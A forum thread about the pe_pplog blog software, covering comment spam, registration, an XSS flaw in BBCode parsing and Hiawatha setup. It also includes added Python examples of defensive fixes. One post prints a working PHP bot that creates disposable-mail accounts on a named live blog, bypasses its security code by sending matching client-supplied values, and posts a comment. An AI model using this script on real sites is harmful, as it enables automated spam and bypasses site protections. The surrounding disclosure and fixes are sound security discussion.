pe_pplog v2.1b bugfixes!
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Wed 04 Dec 2013, 14:55    Post subject: true

will do that once I'm back from travelling

until then, all the other bugfixes and features I described are in v2.1b.

I also put the blog up on github (username: efiabruni) feel free to play around :) I'll be camping in Patagonia :D
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Tue 10 Dec 2013, 08:57    Post subject: changes on github

The last four days I spent on a ferry and had time to play with the pplog.
I made the following changes in the pe_pplog on github:

- Added comment preview option for the admin page
- Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
- Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7984
Location: Perth, Western Australia

Posted: Fri 13 Dec 2013, 10:59

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work, is when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.

_________________
http://barryk.org/news/
anikin

Joined: 10 May 2012
Posts: 859

Posted: Fri 13 Dec 2013, 12:15

Barry wrote:
> Due to the moron named "Author", I have been forced to disable comments

That moron has many names: 'mafur', 'simargl13', 'simargl29' etc. He posted spam and pron on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Fri 13 Dec 2013, 22:20

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Sun 15 Dec 2013, 15:33    Post subject: branching out

I created a branch called comment_registration on github.
In this I changed the pe_pplog.pl file to:
- not accept comments from not registered users
- send a new mail with registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick&ugly fix
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Mon 27 Jan 2014, 05:29    Post subject: comment registration

I have updated the branch comment_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as I don't have sendmail or similar. I use a simple regEx for email validation, this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog
gungsukma

Joined: 18 Sep 2011
Posts: 19

Posted: Fri 07 Feb 2014, 00:30

Code:
I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.


I'm the one who posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I have used (I used PHP, but it will be easy to convert to another language).

Code:
<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email adress
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";


With that script, I can make and register a random username and random email address. Someone blocks one, I'll make one (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code: you can trick it!
In the script, I don't even bother to read the security code; I just need to change the value of the form elements originalCode and code, then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email registration from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of the username of the email address; just accept alphanumerics, dots, and underscores.
- For GMail, remove all dots and labels in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when registering and adding a comment
- Disable the comment on the blog now, I have leaked the bot source code. :twisted:

Oh, "gungsukma@gmail.com" is not mine
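
The bypass described in the post above works because the server compares two values that both arrive in the request (originalCode and code). As an added example, not code from pe_pplog or from the poster, this Python sketch puts that check beside a server-issued, HMAC-signed, single-use challenge; the `token` field name, the key handling and the in-memory replay cache are assumptions. It closes only the trust flaw: a code that a script can read from the page still needs a real CAPTCHA.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # assumption: site secret, never sent to the browser
TOKEN_TTL = 600                       # seconds a challenge stays valid
_seen_nonces = set()                  # replay cache; a CGI script would keep this on disk


def vulnerable_check(form):
    """The flawed pattern: both sides of the comparison come from the client."""
    return form.get("code") == form.get("originalCode")


def _mac(code, nonce, expires):
    msg = f"{code}|{nonce}|{expires}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_challenge(now=None):
    """Return (code to render for the visitor, token for a hidden form field)."""
    now = int(time.time() if now is None else now)
    code = f"{secrets.randbelow(10**6):06d}"
    nonce, expires = secrets.token_hex(8), now + TOKEN_TTL
    return code, f"{nonce}.{expires}.{_mac(code, nonce, expires)}"


def verify_challenge(form, now=None):
    """Accept only an unexpired, unused token whose MAC matches the typed code."""
    now = int(time.time() if now is None else now)
    try:
        nonce, expires, mac = form.get("token", "").split(".")
        expires = int(expires)
    except ValueError:
        return False
    if expires < now or nonce in _seen_nonces:
        return False
    _seen_nonces.add(nonce)  # burn on every attempt: one guess per challenge
    expected = _mac(form.get("code", ""), nonce, expires)
    return hmac.compare_digest(expected.encode(), mac.encode())
```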
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Wed 12 Feb 2014, 16:45    Post subject: re: bots

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
- added disposable email services to block list by default
- stricter rules for email validation

Comment registration is never going to be an official feature; if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I'd rather create galleries and css animations and stuff :)

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of his way to post spam, no bot got past the former security features of the pplog for the past 2 years that I have been using it, nor was it a problem for Barry until now.
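
The registration rules discussed in the two posts above (provider allowlist, disposable-service block list, strict local-part pattern, folding Gmail dot and "+label" aliases) can be combined into one canonicalisation step. This is an added Python example, not the Perl in the comment_registration branch; the function names and the sample addresses in the test data are constructed, and the domain sets contain only the services named in the thread.

```python
import re

ALLOWED_DOMAINS = {"gmail.com", "yahoo.com"}   # the two providers named in the thread
BLOCKED_DOMAINS = {"opentrashbox.org"}         # the disposable service named in the thread
# Letters, digits, dots and underscores only; must start and end with a letter or digit.
LOCAL_RE = re.compile(r"[a-z0-9](?:[a-z0-9._]*[a-z0-9])?")


def canonical_email(raw):
    """Return the canonical form of an acceptable address, or None to reject it."""
    addr = raw.strip().lower()
    if not addr.isascii() or len(addr) > 254 or addr.count("@") != 1:
        return None
    local, domain = addr.split("@")
    if domain in BLOCKED_DOMAINS or domain not in ALLOWED_DOMAINS:
        return None
    if domain == "gmail.com":
        # Gmail ignores dots and anything after "+", so fold the aliases together.
        local = local.split("+", 1)[0].replace(".", "")
    # fullmatch (not match/search) so no newline or shell character can ride
    # along into a mail command line or header.
    if ".." in local or not LOCAL_RE.fullmatch(local):
        return None
    return f"{local}@{domain}"


def try_register(raw, registered, banned):
    """Register one account per canonical address; a ban covers every alias."""
    addr = canonical_email(raw)
    if addr is None or addr in banned or addr in registered:
        return None
    registered.add(addr)
    return addr
```

Storing and banning the canonical form, rather than the string the visitor typed, is what makes a ban survive a re-registration under an alias.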
efiabruni

Joined: 18 Oct 2011
Posts: 69

Posted: Tue 01 Apr 2014, 05:18    Post subject: security issue

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one).

Due to very admissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to XSS attacks.

My advice is to disable bbcode on the comments of ALL versions of the PPLOG.

What is needed:
- URL / SRC validating and escaping
- strict rules for which attributes are allowed, validating and escaping
- additional html escaping

I will fix this properly in the coming weeks
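
The three requirements listed in the post above (URL/SRC validation, a fixed set of allowed attributes, HTML escaping of everything else) fit into one small renderer. This is an added Python example, not the fix that went into pe_pplog; it handles only [url] and [img], and the function names and the http/https scheme allowlist are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}
UNSAFE_URL_CHARS = re.compile(r'[\x00-\x20\x7f<>"\x27\x60]')  # controls, space, < > " ' `
TAG_RE = re.compile(
    r"\[(url|img)\](.*?)\[/\1\]|\[url=([^\]\s]+)\](.*?)\[/url\]", re.I | re.S)


def safe_url(raw):
    """Return raw if it is an absolute http(s) URL with no risky characters, else None."""
    if UNSAFE_URL_CHARS.search(raw):
        return None
    try:
        parts = urlsplit(raw)
    except ValueError:
        return None
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return raw


def render_comment(text):
    """Escape everything, then emit only fixed-attribute tags for validated URLs."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        pos = m.end()
        if m.group(1):                      # [url]u[/url] or [img]u[/img]
            tag, url, label = m.group(1).lower(), m.group(2).strip(), m.group(2).strip()
        else:                               # [url=u]label[/url]
            tag, url, label = "url", m.group(3), m.group(4)
        url = safe_url(url)
        if url is None:
            out.append(html.escape(m.group(0)))  # rejected tag stays inert text
        elif tag == "img":
            out.append(f'<img src="{html.escape(url)}" alt="">')
        else:
            out.append(f'<a href="{html.escape(url)}" rel="nofollow noopener">'
                       f'{html.escape(label)}</a>')
    out.append(html.escape(text[pos:]))
    return "".join(out)
```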
pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

Posted: Mon 02 Jan 2017, 15:01    Post subject: pe_pplog v2.1b
Subject description: 64bit ?
 

Hi,
I am trying out the slacko6.3 64 bit version puppy. Noticed it did not have pplog, then tried all sorts of things. The pe_pplog on this thread I managed to get working on the 32 bit slacko6.3, but... not on the 64 bit. I notice this thread's last entry was 2014. Maybe the program has not been upgraded... is pe_pplog 64 bit compatible?
Thanks.
OscarTalks


Joined: 05 Feb 2012
Posts: 1453
Location: London, England

Posted: Wed 11 Jan 2017, 23:15

I looked into this and the problem seems to be that hiawatha in Slacko64 is reading the config file in /usr/etc/hiawatha rather than the one in /etc/hiawatha
See this post:-
http://murga-linux.com/puppy/viewtopic.php?t=109299&start=10
So long as you are aware of this you can configure it and get it working.

_________________
Oscar in England

pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

Posted: Thu 12 Jan 2017, 10:05    Post subject: pe_pplog v2.1b bugfixes!
Subject description: pup_pplog in slacko6.3 64bit
 

EXCELLENT ! Thank you.
I installed pplog- 1.1.3.pet and then pasted the following into the config file in usr/etc/hiawatha, and it all suddenly worked.



ServerId = webuser
ConnectionsTotal = 150
ConnectionsPerIP = 10
SystemLogfile = /var/log/hiawatha/system.log
GarbageLogfile = /var/log/hiawatha/garbage.log

Binding {
Port = 80
# Interface = 127.0.0.1
}
Hostname = 127.0.0.1
WebsiteRoot = /root/Web-Server
StartFile = index.html
AccessLogfile = /var/log/hiawatha/access.log
ErrorLogfile = /var/log/hiawatha/error.log

#add this stuff to get a perl script working (pplog)...
#QUISP has a binary executable CGI named 'quisp.bin'...
MimetypeConfig = /etc/mime.types
#CGIhandler = /usr/bin/perl:pl
CGIextension = pl,bin
ExecuteCGI = yes
#QUISP puts %0D, %0A (carriage-return, line-feed) chars in the url
#(v128), to allow chars below ascii 32 need this...
SecureURL = no


I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there. Thank you once again.
OscarTalks


Joined: 05 Feb 2012
Posts: 1453
Location: London, England

Posted: Thu 12 Jan 2017, 13:33    Post subject: Re: pe_pplog v2.1b bugfixes!
Subject description: pup_pplog in slacko6.3 64bit
 

pagestep007 wrote:
> I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there.

If you have the original pup_pplog installed and working you can easily substitute pe_pplog (which I presume is more advanced).

Install the .pet from the first post of this thread (hiawatha version of course).
Locate the file /usr/sbin/pplog_gui
Right click and open it as text.
Edit the line near the bottom so it reads:-
exec defaulthtmlviewer http://127.0.0.1:80/pe_pplog.pl
(the original line would be exec defaulthtmlviewer http://127.0.0.1:80/blog/pup_pplog.pl)
Save and close
The usual menu entry will then start and stop hiawatha as before
but the pplog button will launch pe_pplog instead of pup_pplog
[Attached image: pe_pplog-wheezy.jpg. Description: Easy substitution of pe_pplog in place of pup_pplog]


_________________
Oscar in England

pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

Posted: Thu 12 Jan 2017, 21:07    Post subject: pe_pplog v2.1b bugfixes
Subject description: pe_pplog v2.1b in Slacko 6,3 64bit
 

YES INDEED, it worked wonderfully. Thank you.
As I am still on a fresh live CD, remastered onto a USB memory stick, I needed to first install pup_pplog, then do the config substitution to get pup_pplog going, then changed the /usr/sbin/pplog_gui as you instructed. Works well. I will now remaster to another USB.

(a big thank you to all puppy people --maybe not the right thread to write in but ...)
By the way... I am a TV and Cine producer. My entire pipeline can be done from my slacko5.7- 32 bit CD, with a combo of open source programs on it. I can use it right from the disk anywhere on any machine. A few extra programs are stored elsewhere handy to install quickly when needed. The great thing is Puppy does not hog resources and just about everything goes to getting work done. I am using Pentium 4 comps, and some laptops to render on, with the fastest comp a duo core, and with Puppy, even 4K video is possible on these old machines. Blender 2.76b works faster on the 64 bit puppy, so now I am using the slacko6.3 64bit version for special effects processing. Not all my combo of programs work on the 64 bit system, but we will chip away at that one. (the 32 bit combo took about a year to get working well). So a HUGE thanks to all puppy people for your help in keeping us working. Kudos to you all.